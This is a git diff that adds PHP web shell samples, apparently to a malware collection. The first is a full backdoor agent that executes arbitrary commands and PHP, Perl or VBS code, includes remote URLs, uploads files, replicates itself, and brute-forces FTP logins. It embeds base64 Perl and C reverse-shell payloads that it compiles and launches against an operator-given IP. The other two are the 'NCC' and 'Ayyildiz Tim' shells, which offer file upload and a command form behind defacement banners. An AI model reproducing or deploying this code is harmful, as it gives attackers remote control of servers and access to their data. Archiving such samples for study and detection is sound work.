+ $zipfile->addFile($filedump, $filename); # substr($filename, 0, -4)); + } + return $zipfile->getZippedfile(); + } else { + #TODO: use external commands + return ''; + } +} + + +function perms($mode) +{ + if (!$GLOBALS['unix']) return 0; + if( $mode & 0x1000 ) { $type='p'; } + else if( $mode & 0x2000 ) { $type='c'; } + else if( $mode & 0x4000 ) { $type='d'; } + else if( $mode & 0x6000 ) { $type='b'; } + else if( $mode & 0x8000 ) { $type='-'; } + else if( $mode & 0xA000 ) { $type='l'; } + else if( $mode & 0xC000 ) { $type='s'; } + else $type='u'; + $owner["read"] = ($mode & 00400) ? 'r' : '-'; + $owner["write"] = ($mode & 00200) ? 'w' : '-'; + $owner["execute"] = ($mode & 00100) ? 'x' : '-'; + $group["read"] = ($mode & 00040) ? 'r' : '-'; + $group["write"] = ($mode & 00020) ? 'w' : '-'; + $group["execute"] = ($mode & 00010) ? 'x' : '-'; + $world["read"] = ($mode & 00004) ? 'r' : '-'; + $world["write"] = ($mode & 00002) ? 'w' : '-'; + $world["execute"] = ($mode & 00001) ? 'x' : '-'; + if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; + if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; + if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T'; + $s=sprintf("%1s", $type); + $s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); + $s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); + $s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); + return trim($s); +} + +function get_cwd() +{ + global $safe_mode; + global $unix; + global $HTTP_SERVER_VARS; + + $res = ''; + + if (function_exists('getcwd')) + { + $res = @getcwd(); + $res = trim($res); + } + if (empty($res) && function_exists('posix_getcwd')) + { + $res = @posix_getcwd(); + } + if (empty($res) && function_exists('realpath')) + { + $res = @realpath("."); + } + if (empty($res) && !$safe_mode) + { + if ($unix) + { + $res = command("pwd"); + } else { + $res = command("cd"); + } + $res = trim($res); + } + if (empty($res)) + { + $selfpath = ''; + $selfpath = $HTTP_SERVER_VARS['SCRIPT_FILENAME']; + if (empty($selfpath)) $selfpath = $HTTP_SERVER_VARS['PATH_TRANSLATED']; + if (empty($selfpath)) $selfpath = $HTTP_SERVER_VARS['DOCUMENT_ROOT'].$HTTP_SERVER_VARS['PHP_SELF']; + + if (preg_match('/^(.*)[\/\\\\]([^\/\\\\]*)$/', $selfpath, $matches)) + { + $res = $matches[1]; + } else { + $res = $selfpath; + } + } + if (empty($res) && $_ENV['PWD']) + { + $res = $_ENV['PWD']; + } + return $res; +} + +function get_uname() +{ + $res = ''; + global $unix; + + if (empty($res) && function_exists('php_uname')) + { + $res = @php_uname(); + } + if (empty($res) && function_exists('posix_uname')) + { + $h = @posix_uname(); + foreach ($h as $k=>$v) + { + $res .= "$k=$v "; + } + } + + if (empty($res) && !$safe_mode) + { + if ($unix) + { + $res = command("uname -a"); + } else { + $res = command("ver"); + } + $res = trim($res); + } + + if (empty($res)) + { + $res = "$_ENV[OSTYPE] $_ENV[OS] $HTTP_SERVER_VARS[SERVER_SOFTWARE]"; + } + return $res; +} + +function is_unix_os() +{ + $dir = @get_cwd(); + $unix = 0; + if (strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1; + if(empty($dir)) + { + $uname = get_uname(); + if (@eregi("win",$uname)) { $unix = 0; } + else { $unix = 1; } + } + return $unix; +} + +function explode_files ($masklist, $open_dirs = false, $insert_dirnames = false) +{ + $masks = preg_split("/(?read()) ) + { + $result[] = "$cur$file"; + } + $d->close(); + } else { #error opening dir, treating as file + $result[] = $cur; + } + } else { + $result[] = $cur; + } + } + } + return $result; +} + +function safe_dir($dir, $recursive = false, $recursive_limit = 0) +{ + global $unix; + global $fast; + $res = ''; + + if (empty($dir)) $dir = "."; + + $files = explode_files($dir,true,true); + $curdirs = array(); + + if (!$files) return $res; + + foreach ($files as $file) + { + #if ($file=="." || $file=="..") continue; + if (@substr($file,-1,1) == ":") + { + $res .= "$file\n"; + continue; + } + + @clearstatcache(); + if (function_exists('stat')) + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = @stat("$file"); + else { + if (!isset($mtime)) $mtime = @filemtime("$file"); + if (!isset($uid)) $uid = @fileowner("$file"); + if (!isset($gid)) $gid = @filegroup("$file"); + if (!isset($inode)) $inode = @fileinode("$file"); + if (!isset($size)) $size = @filesize("$file"); + } + if (!isset($size)) $size = 0; + + #if(!$unix){ + # $res .= date("d.m.Y H:i",$mtime); + # if(@is_dir($file)) $res .= "
    "; else $res .= sprintf("% 8s ",$size); + #} + #else + { + $owner = array(); + $grpid = array(); + + if (isset($uid)) + { + if (function_exists('posix_getpwuid')) + $owner = @posix_getpwuid($uid); + else + $owner['name'] = $uid; + } + if (empty($owner['name'])) $owner['name'] = '?'; + $owner['name'] = trim($owner['name']); + + + if (isset($gid)) + { + if (function_exists('posix_getgrgid')) + $grpid = @posix_getgrgid($gid); + else + $grpid['name'] = $gid; + } + if (empty($grpid['name'])) $grpid['name'] = '?'; + $grpid['name'] = trim($grpid['name']); + + $res .= sprintf("% 10d ",$inode); + @preg_match('/(^|\/|\\\\)([^\/\\\\]+)$/', $file, $shortname); + + if ($unix) + { + $res .= perms(@fileperms("$file")); + } else { + if (@is_dir($file)) $type = 'd'; + elseif (@is_file($file)) $type = '-'; + elseif (@is_link($file)) $type = 'l'; + elseif ($shortname[2] == "." or $shortname[2] == "..") $type = 'd'; + else $type = '?'; + + $res .= $type; + $res .= "rwx---"; + if (!$fast) + { + $read = 0; $write = 0; + if ($type == '-') + { + if ($handle = @fopen($file,"rb")) + { + $read = 1; + fclose ($handle); + } + if ($handle = @fopen($file,"ab+")) + { + $write = 1; + fclose($handle); + } + } elseif ($type == 'd') + { + $unique_name = "$file/87never_exists_anywhere54"; + if ($handle = @fopen($unique_name, "w+")) + { + $write = 1; + @fclose($handle); + @unlink($unique_name); + } + if ($handle = @opendir($file)) + { + $read = 1; + @closedir($handle); + } + } + if ($read) $res .= "r"; else $res .= "-"; + if ($write) $res .= "w"; else $res .= "-"; + $res .= "x"; + } else { + $res .= "???"; + } + } + $res .= sprintf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grpid['name'],$size); + $res .= date("d.m.Y H:i ",$mtime); + + } + + $res .= "$shortname[2]\n"; + + if (@is_dir("$file")) + { + if ($shortname[2] != "." && $shortname[2] != "..") + $curdirs[] = "$file"; + } + } + + if ($recursive) + { + foreach ($curdirs as $dirname) + { + if ($recursive_limit <= 0) + { + $res .= "\n"; + $res .= safe_dir($dirname, $recursive); + } else { + if ($recursive_limit > 1) + { + $res .= "\n"; + $res .= safe_dir($dirname, $recursive, $recursive_limit-1); + } + } + } + } + return $res; +} + +function DirFilesR($dir,$types='') +{ + global $safe_mode; + $files = Array(); + $mark_as_accessable = 0; + + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if (!empty($file) && !$mark_as_accessable) + { + $mark_as_accessable = 1; + $files[] = ''; + } + + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + + if (!$files && !$safe_mode && !$mark_as_accessable) + { + $listing = command ("ls -1Ra $dir"); + $lines = explode("\n", $listing); + + $curdir = $dir; + foreach ($lines as $line) + { + $line = trim($line); + if (empty($line)) continue; + if ($line == "." || $line == "..") continue; + + if (!$mark_as_accessable) + { + $mark_as_accessable = 1; + $files[] = ''; + } + + if (preg_match("/^(.*):$/",$line,$matches)) + { + $curdir = $matches[1]; + } else { + if($types) + { + $pos = @strrpos($line,"."); + $ext = @substr($line,$pos,@strlen($line)-$pos); + if(@in_array($ext,explode(';',$types))) + $files[] = "$curdir/$line"; + } else + $files[] = "$curdir/$line"; + } + } + } + return $files; +} + +function ReadRegistry($path) +{ + #reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Cache" +} + +function U_value($value) +{ + if ($value == '') return ''; + if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE'; + if ($value === null) return 'NULL'; + if (@is_object($value)) $value = (array) $value; + if (@is_array($value)) + { + @ob_start(); + print_r($value); + $value = @ob_get_contents(); + @ob_end_clean(); + } + return $value; +} + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; + +$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; + + +##################################################################### + +if(version_compare(phpversion(), '4.1.0') == -1) +{ + $_POST = &$HTTP_POST_VARS; + $_REQUEST= &$HTTP_POST_VARS; + $_GET = &$HTTP_GET_VARS; + $_SERVER = &$HTTP_SERVER_VARS; + $_COOKIE = &$HTTP_COOKIE_VARS; +} +if (@get_magic_quotes_gpc()) +{ + foreach ($_GET as $k=>$v) + { + $_GET[$k] = stripslashes($v); + } + foreach ($_POST as $k=>$v) + { + $_POST[$k] = stripslashes($v); + } + foreach ($_REQUEST as $k=>$v) + { + $_REQUEST[$k] = stripslashes($v); + } + foreach ($_COOKIE as $k=>$v) + { + $_COOKIE[$k] = stripslashes($v); + } +} + + +if (function_exists('error_reporting')) @error_reporting(0); +if (function_exists('set_magic_quotes_runtime')) @set_magic_quotes_runtime(0); +if (function_exists('set_time_limit')) @set_time_limit(0); +if (function_exists('ini_set')) +{ + @ini_set('max_execution_time',0); + @ini_set('output_buffering',0); +#TODO: if version 4.2.3 - 4.0.3. +# @ini_set('upload_max_filesize',"100M"); +# if (@ini_get('file_uploads') == false) @ini_set('file_uploads',true); +} + +global $safe_mode; +if (function_exists('ini_get')) +{ + $safe_mode = @ini_get('safe_mode'); +} else { + $safe_mode = 0; +} + +global $unix; +$unix = is_unix_os(); + +if (function_exists('umask')) +{ + $umask = 0755; +} + +$envelope = isset($_REQUEST['envelope']); + +##################################################################### + if ($envelope) + { + echo '__START__9034785902347509238476034857607834__START__'; + } + + global $output; + $output = ''; + global $compress; + $compress = empty($_REQUEST['compress']) ? 0 : $_REQUEST['compress']; + global $use_exec; + $use_exec = empty($_REQUEST['use_exec']) ? 0 : $_REQUEST['use_exec']; + global $fast; + $fast = empty($_REQUEST['rfast']) ? 0 : $_REQUEST['rfast']; + + if (!empty($_REQUEST['not_exec']) && $_REQUEST['not_exec']) $safe_mode = 1; + + $scmd = empty($_REQUEST['spec']) ? '' : $_REQUEST['spec']; + if (empty($scmd)) + $scmd = empty($_REQUEST['scmd']) ? '' : $_REQUEST['scmd']; + + $cfe = empty($_REQUEST['cfe']) ? '' : $_REQUEST['cfe']; + if (empty($cfe)) + $cfe = empty($_REQUEST['rcmd']) ? '' : $_REQUEST['rcmd']; + + $ffr = empty($_REQUEST['rfile']) ? '' : $_REQUEST['rfile']; + $ffrs = empty($_REQUEST['rfiles']) ? '' : $_REQUEST['rfiles']; + $dfr = empty($_REQUEST['rdir']) ? '' : $_REQUEST['rdir']; + $dfra = empty($_REQUEST['rdirall']) ? '' : $_REQUEST['rdirall']; + $info = empty($_REQUEST['rinfo']) ? '' : $_REQUEST['rinfo']; + + if (!empty($HTTP_POST_FILES['userfile']['name'])) + { + if(!empty($_REQUEST['rname'])) + { + $nfn = $_REQUEST['rname']; + } else { + $nfn = $HTTP_POST_FILES['userfile']['name']; + } + + $tmp_name = $HTTP_POST_FILES['userfile']['tmp_name']; + $tmp_size = $HTTP_POST_FILES['userfile']['size']; + + $upload_file = @fopen($tmp_name, "rb"); + if ($upload_file) $target_file = @fopen($nfn, "wb"); + + if ($target_file && $upload_file && !$use_exec) + { + $write_data = @fread($upload_file, $tmp_size); + @fwrite($target_file, $write_data); + + @fclose($target_file); + @fclose($upload_file); + + echo "1\n$nfn upload by fwrite ok"; + } else { + if ($target_file) @fclose($target_file); + if ($upload_file) @fclose($upload_file); + + if (!$use_exec && @copy($tmp_name, $nfn)) + { + echo "1\n$nfn upload by copy ok"; + } else { + $cmd = "cp $tmp_name $nfn 2>&1"; + + echo "@copy failed. Trying $cmd\n"; + $cpres = command($cmd); + if (empty($cpres)) + { + echo "1\n$nfn upload by cp ok"; + } else { + $cmd = "cat $tmp_name >$nfn"; + echo "cp failed. Trying $cmd\n"; + $cpres = command($cmd); + if (@filesize($nfn) == $tmp_size) + { + echo "1\n$name upload by cat ok"; + } else { + echo "0\n$name upload error"; + } + } + } + } + } + + if (!empty($scmd)) + { + if ($scmd == "upload-agent" || $scmd == "upload-data" || $scmd == "upload-url") + { + $agent = ''; + if ($scmd == "upload-agent") + { + $aagent = @file(__FILE__); + $agent = @join("", $aagent); + } elseif ($scmd == "upload-data") { + $agent = $_REQUEST['data']; + } elseif ($scmd == "upload-url") { + $agent = @file_get_contents($_REQUEST['rurl']); + } + + if (empty($agent)) + { + echo "error downloading data\n"; + } + + if (!empty($agent)) + { + $name = $_REQUEST['rname']; + if (empty($name)) + { + $name = "agent.php"; + } + + $file = ''; + if (!$use_exec) + $file = @fopen($name,"wb"); + + if ($file) + { + @fwrite($file, $agent); + @fclose($file); + echo "1\n$name upload ok"; + } else { + print "php file restriction is on\n"; + + $tmpfname = get_temp_filename(); + + if ($tmpfile = @fopen($tmpfname, "wb")) + { + @fwrite($tmpfile, $agent); + @fclose($tmpfile); + } elseif (!$safe_mode) { + echo "can't open for write any temp file $tmpfname\n"; + $esc_agent = @escapeshellarg($agent); + command("echo $esc_agent >$tmpfname"); + } + + if (!$use_exec && @copy($tmpfname, $name)) + { + echo "1\n$name upload ok"; + } else { + if (!$safe_mode) + { + $cmd = "cp $tmpfname $name 2>&1"; + if (!$unix) $cmd = "copy $tmpfname $name"; + + echo "@copy failed. Trying $cmd\n"; + $cpres = command($cmd); + if (empty($cpres)) + { + echo "1\n$name upload ok"; + } elseif (!$safe_mode) { + $cmd = "cat $tmpfname >$name"; + if (!$unix) $cmd = "type $tmpfname >$name"; + + echo "cp failed. Trying $cmd\n"; + $cpres = command($cmd); + if (@file_exists($name)) + { + echo "1\n$name upload ok"; + } else { + echo "0\n$name upload error"; + } + } + } + } + + @unlink($tmpfname); + } + } + } + + if ($scmd == "rm") + { + $masks = $_REQUEST['rname']; + if (!empty($masks)) + { + $files = explode_files($masks); + foreach ($files as $file) + { + if ($use_exec || !@unlink($file)) + { + if ($unix) + { + $output .= command("rm -f $file"); + } else { + $output .= command("del /Q $file"); + } + } + } + } + } + if ($scmd == "cp") + { + $name1 = $_REQUEST['rname1']; + $name2 = $_REQUEST['rname2']; + if (!empty($name1) && !empty($name2)) + { + if ($use_exec || !@copy($name1, $name2)) + { + if ($unix) + { + $output .= command("cp -f $name1 $name2"); + } else { + $output .= command("copy /Y $name1 $name2"); + } + } + } + } + if ($scmd == "mv") + { + $name1 = $_REQUEST['rname1']; + $name2 = $_REQUEST['rname2']; + if (!empty($name1) && !empty($name2)) + { + if ($use_exec || !@rename($name1, $name2)) + { + if ($unix) + { + $output .= command("mv -f $name1 $name2"); + } else { + $output .= command("move /Y $name1 $name2"); + } + } + } + } + if ($scmd == "rmdir") + { + $name = $_REQUEST['rname']; + if (!empty($name)) + { + if ($use_exec || !@rmdir($name)) + { + $output .= command("rmdir $name"); + } + } + } + if ($scmd == "mkdir") + { + $name = $_REQUEST['rname']; + if (!empty($name)) + { + if ($use_exec || !@mkdir($name)) + { + $output .= command("mkdir $name"); + } + } + } + + if ($scmd == "chmod") + { + $mode = $_REQUEST['rmode']; + $masks = $_REQUEST['rname']; + if (!empty($masks) && !empty($mode)) + { + $files = explode_files($masks); + foreach ($files as $name) + { + if ($use_exec || !@chmod($name,$mode)) + { + $output .= command("chmod $mode $name"); + } + } + } + } + + if ($scmd == "chown") + { + $owner = $_REQUEST['rowner']; + $masks = $_REQUEST['rname']; + if (!empty($masks) && !empty($owner)) + { + $files = explode_files($masks); + foreach ($files as $name) + { + if ($use_exec || !@chown($name,$owner)) + { + $output .= command("chown $owner $name"); + } + } + } + } + + if ($scmd == "chgrp") + { + $masks = $_REQUEST['rname']; + $grp = $_REQUEST['rgrp']; + if (!empty($masks) && !empty($grp)) + { + $files = explode_files($masks); + foreach ($files as $name) + { + if ($use_exec || !@chgrp($name,$grp)) + { + $output .= command("chgrp $grp $name"); + } + } + } + } + + if ($scmd == "back-perl") + { + $rip = $_REQUEST['rip'] ? $_REQUEST['rip'] : $_SERVER['REMOTE_ADDR']; + $rport = $_REQUEST['rport'] ? $_REQUEST['rport'] : 11457; + + create_file_base64("/tmp/back",$back_connect); + $p2=which("perl"); + $blah = command($p2." /tmp/back $rip $rport &"); + } + + if ($scmd == "back-c") + { + $rip = $_REQUEST['rip'] ? $_REQUEST['rip'] : $_SERVER['REMOTE_ADDR']; + $rport = $_REQUEST['rport'] ? $_REQUEST['rport'] : 11457; + + create_file_base64("/tmp/back.c",$back_connect_c); + $blah = command("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = command("/tmp/backc $rip $rport &"); + } + + if ($scmd == "eval-php") + { + $code = $_REQUEST['rcode']; + if (!empty($code)) + { + $res = @eval ($code); + if ($res) $output = $res; + + if (!empty($output)) + { + if ($compress) compress($output); + echo $output; + } + } + } + + if ($scmd == "eval-perl") + { + $code = $_REQUEST['rcode']; + if (!empty($code)) + { + $p2 = which("perl"); + $tmpfname = get_temp_filename(); + create_file($tmpfname,$code); + $output = command("$p2 $tmpfname"); + @unlink($tmpfname); + + if (!empty($output)) + { + if ($compress) compress($output); + echo $output; + } + } + } + + if ($scmd == "eval-vbs") + { + $code = $_REQUEST['rcode']; + if (!empty($code)) + { + $tmpfname = get_temp_filename(); + create_file($tmpfname,$code); + $output = command("cscript.exe /Nologo /E:Vbscript $tmpfname"); + @unlink($tmpfname); + + if (!empty($output)) + { + if ($compress) compress($output); + echo $output; + } + } + } + + if ($scmd == "include") + { + include($_REQUEST['rurl']); + } + + if ($scmd == "search") + { + $pattern = $_REQUEST['pattern']; + $grepmode = !empty($_REQUEST['grepmode']) ? $_REQUEST['grepmode'] : 0; + + $files = array(); + $output = ''; + + if (!empty($_REQUEST['tdir'])) + { + $exts = $_REQUEST['exts']; + $target = $_REQUEST['tdir']; + $files = DirFilesR($target, $exts); + } elseif (!empty($_REQUEST['tfile'])) { + $files[] = $_REQUEST['tfile']; + } + + if ($files) + { + foreach ($files as $file) + { + if (empty($file)) continue; + + $content = eat_file($file); + if (!empty($content)) + { + if ($grepmode == 0) + { + if (preg_match("$pattern", $content)) + $output .= "$file\n"; + } else { + $repfile = false; + + if (preg_match_all("$pattern", $content, $matches, PREG_PATTERN_ORDER)) + { + if ($grepmode == 2 && !$repfile) + { + $output .= "~!$file:\n"; + $repfile = true; + } + $tolist = $grepmode == 3 ? $matches[1] : $matches[0]; + foreach ($tolist as $match) + { + if ($grepmode == 1) + $output .= "$file:"; + $output .= "$match\n"; + } + } + } + } + } + } else { + $output = "??? error enumerating target dir/file!\n"; + } + + if ($compress) compress($output); + echo $output; + } + + if ($scmd == "ftp-test") + { + $output = ''; + $ftp_server = !empty($_REQUEST['fserver']) ? $_REQUEST['fserver'] : "127.0.0.1"; + $ftp_port = !empty($_REQUEST['fport']) ? $_REQUEST['fport'] : 21; + + $connection = @ftp_connect ($ftp_server,$ftp_port,10); + if (!$connection) { + $output .= "error connecting to $ftp_server:$ftp_port\n"; + } else { + @ftp_close($connection); + + $flogins = explode("\n",$_REQUEST['flogins']); + $fpasswords = explode("\n",$_REQUEST['fpasswords']); + + $found = false; + foreach ($flogins as $login) + { + if (empty($login)) next; + foreach ($fpasswords as $password) + { + if (empty($password)) next; + $connection = @ftp_connect($ftp_server,$ftp_port,10); + if (!$connection) { + $output .= "$login:$password:-1\n"; + } else { + if (@ftp_login($connection,$login,$password)) + { + $output .= "$login:$password:1\n"; + $found = true; + break; + } else { + $output .= "$login:$password:0\n"; + } + @ftp_close($connection); + } + } + if ($found) break; + } + } + } + + if ($compress) compress($output); + echo $output; + } + + if (!empty($cfe)) + { + $output = command($cfe); + if ($compress) compress($output); + echo $output; + } + + if (!empty($ffr)) + { + if (!$envelope) + { + @header("Content-type: application/octet-stream"); + @header("Content-disposition: attachment; filename=\"".$ffr."\";"); + } + $output = eat_file($ffr); + if ($compress) compress($output); + echo $output; + } + + if (!empty($ffrs)) + { + if (!$envelope) + { + @header("Content-type: application/zip"); + } + + $ffrs = trim($ffrs); + $files = preg_split("/\s+/", $ffrs, -1, PREG_SPLIT_NO_EMPTY); + + $output = make_zip($files); + echo $output; + } + + if (!empty($dfr)) + { + if (!$use_exec) + { + $dfr = trim($dfr); + $output .= safe_dir($dfr); + } + + if (!$safe_mode && empty($output)) + { + if ($unix) + { + $output .= command("ls -liaL $dfr"); + } else { + $output .= command("dir /a $dfr"); + } + } + + if ($compress) compress($output); + echo $output; + } + + if (!empty($dfra)) + { + $recur_limit = !empty($_REQUEST['rlimit']) ? $_REQUEST['rlimit'] : 0; + if (!$use_exec) + { + $dfra = trim($dfra); + $output .= safe_dir($dfra, true, $recur_limit); + } + + if (!$safe_mode && empty($output)) + { + if ($unix) + { + $output .= command("ls -liRaL $dfra"); + } else { + $output .= command("dir /S /a $dfra"); + } + } + + if ($compress) compress($output); + echo $output; + } + + if (!empty($info)) + { + $output = ''; + switch ($info) + { + case 'ver': + $output = $version; + if ($safe_mode) $output .= " (safe mode)"; + break; + case 'uname': + $output = get_uname(); + break; + case 'id': + if (!$safe_mode) + { + if($unix) { + $output = command("id"); + } else { + $output = command("whoami"); + } + $output = trim($output); + } + + if (empty($output)) + { + $found = 0; + if (function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid')) + { + $euserinfo = @posix_getpwuid(@posix_geteuid()); + $egroupinfo = @posix_getgrgid(@posix_getegid()); + if ($euserinfo || $egroupinfo) + { + $output = 'uid='.$euserinfo['uid'].'('.$euserinfo['name'].') gid='.$egroupinfo['gid'].'('.$egroupinfo['name'].')'; + $found = 1; + } + } + + if (!$found) + { + if (function_exists('get_current_user')) + $output .= "user=".@get_current_user(); + + if (function_exists('getmyuid')) + $output .= " uid=".@getmyuid(); + + if (function_exists('getmygid')) + $output .= " gid=".@getmygid(); + } + } + break; + case 'pwd': + $output = get_cwd(); + break; + case 'safe-mode': + $output = $safe_mode ? '1' : '0'; + break; + case 'unix-os': + $output = $unix ? '1': '0'; + break; + case 'php-info': + $output = @phpinfo(-1); + break; + case 'php-ini': + if (function_exists('ini_get_all')) + { + foreach (@ini_get_all() as $key=>$value) + { + $output .= "$key"."".U_value($value['local_value'])."".U_value($value['global_value'])."\n"; + } + } + break; + case 'disk': + $name = $REQUEST['rname']; + if (empty($name)) + if ($unix) + $name = "/"; + else + $name = "\\"; + $output = @disk_free_space($name)."/".@disk_total_space($name); + break; + case 'disk-list': + for ($disk = 'C'; $disk < 'Z'; ++$disk) + { + if (@disk_total_space("$disk:")) + { + $output .= "$disk:\n"; + } + } + break; + case 'env': + if ($_SERVER) + { + foreach ($_SERVER as $key=>$value) + { + $output .= "$key:".U_value($value)."\n"; + } + } else { + global $HTTP_SERVER_VARS; + foreach ($HTTP_SERVER_VARS as $key=>$value) + { + $output .= "$key:".U_value($value)."\n"; + } + } + + $cmdenv = ''; + if (!$safe_mode) + { + if ($unix) $cmdenv = command('env'); + else $cmdenv = command('set'); + } + + if (!empty($cmdenv)) + { + $output .= @join(":", split("=", $cmdenv)); + } else { + if ($_ENV) + { + foreach ($_ENV as $key=>$value) + { + $output .= "$key:".U_value($value)."\n"; + } + } else { + global $HTTP_ENV_VARS; + foreach ($HTTP_ENV_VARS as $key=>$value) + { + $output .= "$key:".U_value($value)."\n"; + } + } + } + break; + + } + if ($compress) compress($output); + echo $output; + } + + if ($envelope) + { + echo '__STOP__9034785902347509238476034857607834__STOP__'; + die; + } + +?> diff --git a/PHP/Backdoor.PHP.Agent.u b/PHP/Backdoor.PHP.Agent.u new file mode 100644 index 00000000..0352556b --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.u @@ -0,0 +1,60 @@ +
    +

    .:NCC:. Shell v1.0.0

    +.:NCC:. Shell v1.0.0 +

    Hacked by Silver

    +

    ---------------------------------------------------------------------------------------


    +---Server Info---
    +Safe Mode on/off: "; +// Check for safe mode +if( ini_get('safe_mode') ) { + print 'Safe Mode ON'; +} else { + print 'Safe Mode OFF'; +} +echo "
    "; +echo "Momentane Directory: "; echo $_SERVER['DOCUMENT_ROOT']; +echo "
    "; +echo "Server:
    "; echo $_SERVER['SERVER_SIGNATURE']; +echo "PHPinfo"; +if(@$_GET['p']=="info"){ +@phpinfo(); +exit;} +?> +

    ---------------------------------------------------------------------------


    +

    - Upload -

    +Upload - Shell/Datei +
    + + +
    +
    +\n", + $_FILES['probe']['name']); + printf("Sie ist %u Bytes groß und vom Typ %s.
    \n", + $_FILES['probe']['size'], $_FILES['probe']['type']); + } +?> +

    ---------------------------------------------------------------------------


    +

    IpLogger

    +
    IP:
    "; echo $_SERVER['REMOTE_ADDR']; +echo "
    PORT:
    "; echo $_SERVER['REMOTE_PORT']; +echo "
    BROWSER:
    "; echo $_SERVER[HTTP_REFERER]; +echo "
    REFERER:
    "; echo $_SERVER['HTTP_USER_AGENT']; +?> +

    ---------------------------------------------------------------------------


    +

    Directory Lister

    +

    >

    +

    ---------------------------------------------------------------------------


    +--Coded by Silver©--
    +~|_Team .:National Cracker Crew:._|~
    +-->NCC<--
    diff --git a/PHP/Backdoor.PHP.Agent.v b/PHP/Backdoor.PHP.Agent.v new file mode 100644 index 00000000..120f5df2 --- /dev/null +++ b/PHP/Backdoor.PHP.Agent.v @@ -0,0 +1,317 @@ + + + + + + +Ayyildiz Tim | AYT | Shell v 2.1 Biz Büyük Türk Milletinin Hizmetindeyiz... + + + + + + + + + + + + + + + + +HACKED BY AYYILDIZ ™ + + + + + + + + +
    + + + + + + +
    +

    + + + + + + +
    +
    +
    + +
    + + + + + + +Ayyildiz-Tim Shell <?php echo PHPSHELL_VERSION ?> + + + +
    + + + + +

    +
    +
    +
    +

    Bulundugunuz Dizin: + Root/'; + +if (!empty($work_dir_splitted[0])) { + $path = ''; + for ($i = 0; $i < count($work_dir_splitted); $i++) { + $path .= '/' . $work_dir_splitted[$i]; + printf('%s/', + $PHP_SELF, urlencode($path), $work_dir_splitted[$i]); + } +} + +?> +

    +

    Dizin Degistir : + +

    +

    Komut: + + +

    +

    Surekli Bagli Kal + +

    + +
    + +
    +
    +
    + +

    Copyright © 2006–2007, Powered byThehacker. v 2.1 - www.ayyildiz.org

    +

